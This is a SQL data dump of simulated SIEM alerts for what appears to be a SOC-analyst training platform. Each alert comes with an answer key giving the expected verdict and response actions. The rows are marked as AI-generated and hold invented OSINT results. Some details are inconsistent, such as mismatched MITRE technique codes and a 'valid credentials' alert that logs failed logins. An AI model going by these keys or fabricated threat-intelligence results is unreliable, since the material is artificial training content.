(1828, 'Routine IT Vulnerability Scan Detected', 'low', 'Splunk', 'A high volume of network connections was detected from an internal scanning tool. This activity is consistent with routine vulnerability assessments conducted by IT.', 'Network Scan', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"scanner_account\",\"hostname\":\"vuln-scan-01\",\"command_line\":\"nmap -sS -p 1-65535 192.168.1.200\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"Internal IP used for authorized vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS -p 1-65535 192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"Command consistent with routine vulnerability scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scan\",\"analysis_notes\":\"The detected activity was verified as part of scheduled IT security assessments.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1829, 'Authorized Administrative Backup Activity', 'low', 'Wazuh', 'A backup process was initiated by an authorized admin user. This activity matches the scheduled backup routine.', 'Data Transfer', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.20\",\"username\":\"backup_admin\",\"hostname\":\"backup-server-01\",\"command_line\":\"rsync -av /data /backup/\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"Internal IP of authorized backup server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -av /data /backup/\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"Authorized backup command executed by admin.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"The activity is part of a scheduled administrative task for data backup.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1830, 'Benign System Health Check Activity', 'low', 'Azure Sentinel', 'System health check performed by an internal monitoring tool. The detected activity aligns with routine system maintenance procedures.', 'System Monitoring', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.75\",\"username\":\"monitor\",\"hostname\":\"health-check-01\",\"command_line\":\"check_system_health -t all\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"Internal IP of system monitoring server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"check_system_health -t all\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"Command executed by internal monitoring tool.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_monitoring\",\"analysis_notes\":\"The activity was confirmed as part of a routine system health check.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1831, 'Misconfigured Legacy Application Detected', 'medium', 'Elastic SIEM', 'Unusual traffic patterns noted from a legacy application server. The application is known for generating false positives due to outdated configurations.', 'Network Anomaly', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T17:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.10.10.10\",\"dst_ip\":\"10.10.10.20\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server-01\",\"command_line\":\"legacy_app.exe\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.10.10.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"Internal IP of misconfigured legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"legacy_app.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"Known false positive due to outdated application settings.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"Activity is consistent with the legacy application\'s known behavior.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1832, 'Valid Administrative Login from Unusual Location', 'medium', 'Splunk', 'A valid login was detected from an unusual geographic location for a user account. However, this was verified as the user\'s authorized travel.', 'Credential Use', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.1.5\",\"username\":\"jdoe\",\"hostname\":\"vpn-gateway\",\"command_line\":\"\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with unusual login activity but verified as user travel.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"User confirmed to be traveling and using authorized access.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_use\",\"analysis_notes\":\"Login was verified as legitimate due to user travel.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1833, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'Multiple network connections were detected originating from an internal vulnerability scanner. This is part of routine security checks.', 'Network Activity', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.1\",\"username\":\"scanner_account\",\"hostname\":\"vuln-scan-01\",\"command_line\":\"nmap -sV -p 1-65535 192.168.1.1\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV -p 1-65535 192.168.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for authorized internal scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"This is a scheduled internal vulnerability scan.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1834, 'Authorized Administrative Backup Activity', 'low', 'Azure Sentinel', 'A scheduled backup operation was detected on critical servers. This is part of routine data protection procedures.', 'Data Backup', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.20\",\"username\":\"backup_admin\",\"hostname\":\"backup-server-01\",\"command_line\":\"backup.exe /run /source:server01 /dest:backup-server-01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal server IP involved in backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"backup.exe /run /source:server01 /dest:backup-server-01\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified as a legitimate backup command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_backup\",\"analysis_notes\":\"Scheduled backup job as part of data protection strategy.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1835, 'Routine System Health Check Activity', 'low', 'Wazuh', 'System health monitoring detected an increase in process execution from a known maintenance script.', 'System Monitoring', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.5\",\"hostname\":\"monitor-01\",\"username\":\"monitor_service\",\"command_line\":\"healthcheck.sh --all\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IP of the health monitoring server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"healthcheck.sh --all\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a routine system health check command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_monitoring\",\"analysis_notes\":\"This activity is part of scheduled system health checks.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1836, 'Misconfigured Legacy Application Detected', 'medium', 'Elastic SIEM', 'A legacy application was identified making unusual network requests. This behavior is due to misconfiguration.', 'Network Activity', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:20:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.42\",\"dst_ip\":\"203.0.113.200\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server-01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity associated with this external IP.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"Legacy application is misconfigured, causing unusual but benign network behavior.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1837, 'Brute Force Login Attempt from Suspicious IP', 'high', 'Wazuh', 'Multiple failed login attempts detected from a foreign IP. Investigation confirms it is part of a brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:15Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.86.151.76\",\"dst_ip\":\"10.0.0.50\",\"username\":\"admin\",\"hostname\":\"web-server-01\",\"failed_attempts\":25}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.86.151.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Commonly targeted username in brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"OSINT confirms the IP is involved in malicious activities, validating the alert.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1838, 'Routine Vulnerability Scan Detected', 'low', 'Splunk', 'A network scan was detected originating from an internal IT management server. This activity appears to be a routine vulnerability assessment.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:23Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"svc_scan\",\"hostname\":\"IT-Scanner-01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for network management tasks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity is consistent with scheduled vulnerability scans by IT.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1839, 'Unusual Email Received from Trusted Domain', 'medium', 'Proofpoint', 'An email containing a suspicious link was received from a normally trusted domain. Investigation revealed it to be a legitimate marketing campaign.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.56\",\"email_sender\":\"newsletter@trustedcompany.com\",\"url\":\"https://trustedcompany.com/promo\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No negative reports associated with this IP\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://trustedcompany.com/promo\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Verified as part of a legitimate campaign\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"OSINT confirmed the URL and sender domain as part of a legitimate marketing effort.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1840, 'Scheduled System Health Check Detected', 'low', 'Wazuh', 'A system health check script was executed, flagged by the system due to its similarity to known attack patterns. It was confirmed to be a scheduled maintenance task.', 'Command Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.150\",\"hostname\":\"Server-Maintenance\",\"command_line\":\"/usr/local/bin/syscheck.sh\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for system maintenance\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/local/bin/syscheck.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a routine system check script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"command_execution\",\"analysis_notes\":\"The command is part of scheduled health checks performed regularly.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1841, 'Misconfigured Application Causing Suspicious Traffic', 'medium', 'Elastic SIEM', 'High volume of outbound traffic from a legacy app server was flagged as suspicious. Investigation indicates a misconfiguration causing excess data sync.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:50:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.200\",\"dst_ip\":\"203.0.113.99\",\"hostname\":\"LegacyApp-Server\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this external IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The traffic was due to a misconfigured sync process rather than malicious exfiltration.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1842, 'Unauthorized Credential Usage Detected', 'high', 'Azure Sentinel', 'Anomalous login attempt detected from a foreign IP using valid credentials. OSINT confirms this IP is associated with brute force attacks.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:22:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.143.223.12\",\"username\":\"jdoe\",\"hostname\":\"Corp-Login-01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"No known issues with this user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is linked to known brute force attacks, confirming malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1843, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A vulnerability scanning tool was detected scanning internal systems for vulnerabilities. The activity originated from a known internal IP address.', 'Network Scanning', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"admin\",\"hostname\":\"vulnscanner01\",\"request_body\":\"\",\"command_line\":\"nmap -sV -p 1-65535 192.168.1.101\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV -p 1-65535 192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Tool Documentation\",\"verdict\":\"clean\",\"details\":\"Standard command for internal network scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scanning\",\"analysis_notes\":\"Routine scanning by IT department for security assessment.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1844, 'Suspicious Login Attempt from Authorized Backup System', 'medium', 'Azure Sentinel', 'An unusual login attempt was detected from an IP address belonging to an authorized backup system. The login attempt appears to be part of routine backup processes.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.1.200\",\"username\":\"backup_admin\",\"hostname\":\"backup01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by backup systems.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Records\",\"verdict\":\"clean\",\"details\":\"Authorized user account for backup processes.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempt was part of a scheduled backup routine.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1845, 'Authorized Administrative Backup Detected', 'low', 'Wazuh', 'A scheduled administrative backup was initiated, detected as a high volume of network traffic. This is a routine operation.', 'Data Transfer', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T01:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"192.168.1.250\",\"username\":\"backup_service\",\"hostname\":\"backupserver01\",\"request_body\":\"\",\"command_line\":\"rsync -av --delete /data 192.168.1.250:/backup\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -av --delete /data 192.168.1.250:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Backup Procedure Manual\",\"verdict\":\"clean\",\"details\":\"Scheduled backup command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"Recognized as part of routine data backup operations.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1846, 'Misconfigured Legacy Application Activity', 'medium', 'Elastic SIEM', 'A legacy application generated excessive network traffic and login attempts, which were flagged as suspicious but matched known behavior patterns.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.100\",\"username\":\"legacy_app\",\"hostname\":\"legacyserver01\",\"request_body\":\"\",\"command_line\":\"python legacy_script.py\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Map\",\"verdict\":\"internal\",\"details\":\"IP address of legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python legacy_script.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Legacy System Documentation\",\"verdict\":\"clean\",\"details\":\"Regularly executed script on legacy systems.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Activity consistent with routine operation of legacy applications.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1847, 'Unauthorized Application Installation Detected', 'high', 'Wazuh', 'A suspicious process execution was detected on a workstation, indicating potential unauthorized software installation.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.3.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"request_body\":\"\",\"command_line\":\"C:\\\\Temp\\\\malicious_installer.exe\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for distributing malware.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Temp\\\\malicious_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Executable file flagged as malicious by 12 antivirus engines.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This alert is a true positive, indicating a malware infection attempt on the workstation.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1848, 'Routine Vulnerability Scanning Detected from Internal Network', 'low', 'Splunk', 'A series of network vulnerability scans originating from an internal IP address were detected. These scans are part of a scheduled system health check by the IT department.', 'Network Scanning', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.1.10\",\"username\":\"it_admin\",\"hostname\":\"scanner01.internal.net\",\"command_line\":\"nmap -sV -p- 192.168.1.10\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for routine scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV -p- 192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for vulnerability assessment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scanning\",\"analysis_notes\":\"The activity was confirmed as a sanctioned IT operation for vulnerability scanning.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1849, 'Failed Login Attempts from External IP Address', 'medium', 'Elastic SIEM', 'Multiple failed login attempts were detected from an external IP address. These activities were investigated and found to be part of an authorized external penetration test.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.20\",\"username\":\"external_tester\",\"hostname\":\"webserver01.internal.net\",\"failed_attempts\":15}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for failed login attempts during authorized test\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"external_tester\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Username used during authorized penetration testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP was part of a scheduled penetration test with known credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
